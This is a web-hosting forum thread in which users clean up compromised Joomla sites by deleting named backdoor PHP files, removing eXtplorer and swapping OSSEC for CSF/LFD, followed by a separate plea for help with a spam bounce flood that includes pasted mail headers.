If OSSEC operates anything like LFD, it writes a logfile of its own where it records its actions. IP blocks are performed via iptables, and it also has a block management of its own. (Then again, CSF/LFD has a GUI that can be integrated in Webmin, don’t know if OSSEC has the same.)
Hi
My english is not enough but I will try to help.:
I see in your log this file/script php :
sys09725848.php <<<< this is reason DELETE this file
/components/com_mailto/sys09725848.php i think this is the path to this file
use akkeba admin tools to fix permission folder and file
upgruade joomla and check your htaccess file<<
THANK YOU! I found that file, but it was in /components/com_media/ Either way, that sure looks like it!
I am having a hard time with OSSEC, I’d like to look into CSF/LFD. Can you point me in the right direction as to how to integrate it with Webmin?
The CSF archive contains a Webmin module which you can import into Webmin. The Readme file should contain instructions how to do that.
found it, thanks. Now I just have to get it all configured. . .
I just wanted to update; All is running smoothly now. I swapped OSSEC for CSF/LFD. I think OSSEC was probably working fine, but I couldn’t see what it was actively doing, so I didn’t trust it. CSF NEEDED a lot of setup before it was useful (as in, not alert me for everything) I almost pulled the plug on it, but am happy with it now, and I can see what it is doing. (by see, I don’t mean it has fancy graphs and charts, I mean I can tell what it is doing. A simple text list spit out on the command line is good enough, but I couldn’t get OSSEC to do that for me)
I think I also may have found were the malicious file may have got in, through a social login plugin by Login Radius. I have disabled the module and all “suspicious proccess” reports from ourshore.ca have stopped.
Thanks for all your help. . . on to the next thing.
Please open folder plugin do you see .joomla.system.php ?
this file is backdoor:
Thank you again! I just went through 7 different Joomla sites and removed eXtplorer. I never used it much anyway. Came in handy for client with their own hosting (GoDaddy, ugh) but I don’t need it.
Only the one site had any of the malicious files on it.
ok, second update - I was wrong about where I thought the security hole was.
astecko had it right in his reply above (about 6 down from the top)
i turned my emails on my phone tonight and it came through 600 undelivered mail returned,
logged into the virtualmin tonight and its still going (9,500 in under 1 hour) i have tried disabling the server, changing the email password. The account in question is info@espressowebdesign.co.uk
email headers as follows:
Return-Path:<>
X-Spam-Checker-Version:SpamAssassin 3.3.1 (2010-03-16) on
ewd01.espressowebdesign.net
X-Spam-Level:*
X-Spam-Status:No, score=1.7 required=5.0 tests=NO_RELAYS,URIBL_BLACK
autolearn=no version=3.3.1
X-Original-To:info@espressowebdesign.co.uk
Delivered-To:info-espressowebdesign.co.uk@espressowebdesign.net
Received:by ewd01.espressowebdesign.net (Postfix) id 46BCACC80A; Fri,
20 Jun 2014 19:28:49 +0100 (BST)
Date:Fri, 20 Jun 2014 19:28:49 +0100 (BST)
From:MAILER-DAEMON@espressowebdesign.net (Mail Delivery System)
Subject:Undelivered Mail Returned to Sender
To:info@espressowebdesign.co.uk
Auto-Submitted:auto-replied
MIME-Version:1.0
Content-Type:multipart/report; report-type=delivery-status;
boundary=“7B025CC7F5.1403288929/ewd01.espressowebdesign.net”
Message-Id:20140620182849.46BCACC80A@ewd01.espressowebdesign.net
Message contents
This is the mail system at host ewd01.espressowebdesign.net.
I’m sorry to have to inform you that your message could not
be delivered to one or more recipients. It’s attached below.
For further assistance, please send mail to postmaster.
If you do so, please include this problem report. You can
delete your own text from the attached returned message.
The mail system
hubert.pattermann@tele2.at: host mailgw.swip.net[212.247.156.1] said: 550
hubert.pattermann@tele2.at unknown user account (in reply to RCPT TO
command)
Failed delivery status
Final recipienthubert.pattermann@tele2.at
Reason for failure550 hubert.pattermann@tele2.at unknown user account
Remote mail servermailgw.swip.net
Reporting mail serverewd01.espressowebdesign.net
problem is guys the person who controls, runs support and helps me with this is away on holiday, i dont have a clue how this works. can anyone help?
desperate
Hi there,
Could you start a new Forum thread for the email issue you’re seeing?
That would make it a bit easier to help, since this current thread is a bit on the older side.
Then we’ll be able to get a fresh start and figure out what’s going on 
Thanks!
-Eric